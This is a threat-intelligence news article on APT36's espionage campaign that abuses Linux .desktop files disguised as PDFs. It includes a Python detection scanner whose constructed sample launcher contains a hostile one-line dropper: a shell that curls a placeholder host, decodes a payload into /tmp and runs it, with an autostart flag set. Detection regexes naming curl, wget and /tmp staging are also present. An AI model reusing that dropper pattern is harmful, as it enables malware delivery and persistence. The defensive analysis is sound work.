APT36 Exploits Linux .desktop Files for Espionage Malware in Ongoing Cyber Attacks
The Pakistani threat group APT36 has launched new cyber-espionage attacks targeting India’s government and defense sectors by abusing Linux .desktop files to deploy malware.
According to recent reports from CYFIRMA and CloudSEK, the campaign—first detected on August 1, 2025—is still active. Researchers highlight that this activity focuses on data theft, long-term surveillance, and persistent backdoor access. Notably, APT36 has a history of using .desktop files in espionage operations across South Asia.
Abuse of Linux Desktop Files
Victims receive phishing emails containing ZIP archives with a disguised .desktop file masquerading as a PDF. Once opened, the file triggers a hidden bash command that fetches a hex-encoded payload from an attacker-controlled server or Google Drive, writes it into /tmp/, makes it executable with chmod +x, and launches it in the background.
To avoid suspicion, the malware also opens Firefox to display a decoy PDF hosted online. The attackers set Terminal=false so that no terminal window appears when the launcher runs, and X-GNOME-Autostart-enabled=true so that the entry runs again at every login.
While .desktop files are typically harmless text-based launchers defining icons and commands, APT36 weaponized them as malware droppers and persistence mechanisms—a method similar to how Windows LNK shortcuts are exploited.
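The indicators described above (a document-like Name, an Exec line that spawns an inline shell, downloads content, stages a file in /tmp and backgrounds it, plus the autostart flag) can be checked mechanically. The heuristic scanner below is an added example, not code from CYFIRMA, CloudSEK or the article; the two sample launchers, their placeholder URLs and the indicator labels are constructed for illustration.

```python
import configparser
import re
from typing import List

# Constructed sample in the shape the article describes (document-like name,
# hidden terminal, autostart flag, inline shell that stages a file in /tmp).
# The URLs are placeholders; nothing here is a real payload.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notes.pdf
Icon=application-pdf
Terminal=false
X-GNOME-Autostart-enabled=true
Exec=bash -c "curl -s http://example.invalid/p.hex | xxd -r -p > /tmp/.cache; chmod +x /tmp/.cache; /tmp/.cache & firefox http://example.invalid/decoy.pdf"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

def scan_desktop_entry(text: str) -> List[str]:
    """Return the indicator labels matched by one .desktop file's contents."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # .desktop keys are case-sensitive; keep them as written
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        return ["no [Desktop Entry] section"]
    entry = cp["Desktop Entry"]
    name, exec_line = entry.get("Name", ""), entry.get("Exec", "")
    findings = []
    if re.search(r"\.(pdf|docx?|xlsx?|pptx?)$", name, re.IGNORECASE):
        findings.append("Name mimics a document file")
    if re.search(r"\b(ba|da|z)?sh\s+-c\b", exec_line):
        findings.append("Exec runs an inline shell command")
    if re.search(r"\b(curl|wget)\b", exec_line):
        findings.append("Exec downloads remote content")
    if "/tmp/" in exec_line or "chmod +x" in exec_line:
        findings.append("Exec stages or executes a file in /tmp")
    if re.search(r"[^&]&(?!&)", exec_line):  # a single '&', not '&&'
        findings.append("Exec backgrounds a process")
    # The flag only takes effect for entries placed in an autostart directory.
    if entry.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        findings.append("autostart flag set (persistence if placed in an autostart dir)")
    return findings
```

Run it over ~/.config/autostart, /etc/xdg/autostart and recently extracted archives; Terminal=false alone is not flagged because it is the default for most legitimate launchers.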
The dropped malware is a Go-based ELF executable with espionage capabilities. Despite obfuscation, researchers confirmed it can:
- Remain hidden,
- Achieve persistence via cron jobs and systemd services,
- Establish C2 communication through a bi-directional WebSocket channel for remote command execution and data exfiltration.
Both cybersecurity firms conclude that APT36 is evolving its tactics, becoming increasingly evasive, stealthy, and sophisticated, making detection on Linux environments difficult since .desktop abuse is rarely monitored by security tools.